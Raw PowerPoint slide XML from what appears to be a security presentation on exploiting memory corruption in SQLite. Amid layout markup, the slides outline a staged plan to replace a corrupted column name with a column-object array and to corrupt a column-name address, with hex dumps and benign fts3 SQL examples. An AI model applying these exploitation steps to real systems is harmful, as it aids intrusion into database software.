                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>AA……………</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3998374" y="4309501"/>
            <a:ext cx="276299" cy="456008"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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V="1">
            <a:off x="4653574" y="4309501"/>
            <a:ext cx="5771373" cy="456008"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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135" name="Rectangle 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597" y="687623"/>
            <a:ext cx="782508" cy="131619"/>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40" name="Straight Arrow Connector 139"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7455422" y="2905125"/>
            <a:ext cx="0" cy="52387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2708297"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 7</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3557" y="694839"/>
            <a:ext cx="6399634" cy="5567682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715530733"/>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Plan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10934700" cy="4375150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> the 0x1000 sized column name with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column object array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> which one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>s inside the array is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corrupted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Just a tiny step forward…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="566373587"/>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29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5495923" y="1747485"/>
            <a:ext cx="5324477" cy="3472215"/>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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809750" y="3228975"/>
            <a:ext cx="2733675" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Corrupted column name</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4543425" y="3424238"/>
            <a:ext cx="923923" cy="8453"/>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159704"/>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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="1690335"/>
            <a:ext cx="5391152" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>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325806719"/>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10 21 54 64 A0 21 00 00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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809750" y="3228975"/>
            <a:ext cx="2733675" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="42" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4543425" y="3424238"/>
            <a:ext cx="923923" cy="8453"/>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5495923" y="1747485"/>
            <a:ext cx="5324477" cy="3472215"/>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210653747"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610098" y="1883898"/>
            <a:ext cx="885825" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FF0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FF000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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 21 54 64 A0 21 00 00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2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524497" y="1788058"/>
            <a:ext cx="2619377" cy="212191"/>
          </a:xfrm>
          <a:prstGeom prst="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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295521" y="1699860"/>
            <a:ext cx="2638425" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column Name Address</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8191498" y="1788058"/>
            <a:ext cx="2619377" cy="212191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8191498" y="2036511"/>
            <a:ext cx="2619377" cy="212191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524496" y="2036251"/>
            <a:ext cx="2619377" cy="212191"/>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7" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610098" y="2134684"/>
            <a:ext cx="885825" cy="0"/>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2674211" y="1950646"/>
            <a:ext cx="2638425" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collating Sequence</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610098" y="1449074"/>
            <a:ext cx="4891089" cy="338984"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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p:cNvCxnSpPr>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4610098" y="2248702"/>
            <a:ext cx="4891089" cy="382670"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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3204293" y="1260709"/>
            <a:ext cx="2638425" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default Value</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3241237" y="2434732"/>
            <a:ext cx="2638425" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Various Flags</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37052728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 y="0"/>
            <a:ext cx="12192000" cy="3526971"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298579" y="4012163"/>
            <a:ext cx="11579289" cy="2286099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> the virtual table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="335897"/>
            <a:ext cx="11579289" cy="3004461"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE VIRTUAL TABLE mail USING fts3(subject, body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INTO mail(subject, body) VALUES('sample subject1', 'sample content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INTO mail(subject, body) VALUES('sample subject2', 'hello world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> * FROM mail WHERE body MATCH 'sample';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="847550950"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533525" y="3236877"/>
            <a:ext cx="2981325" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Corrupt one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column name address</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4514850" y="3552825"/>
            <a:ext cx="933450" cy="7218"/>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5</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2530528848"/>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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5</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725151849"/>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02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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55930"/>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63839364"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1509350" y="390443"/>
            <a:ext cx="3763099" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT A_0 from table2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
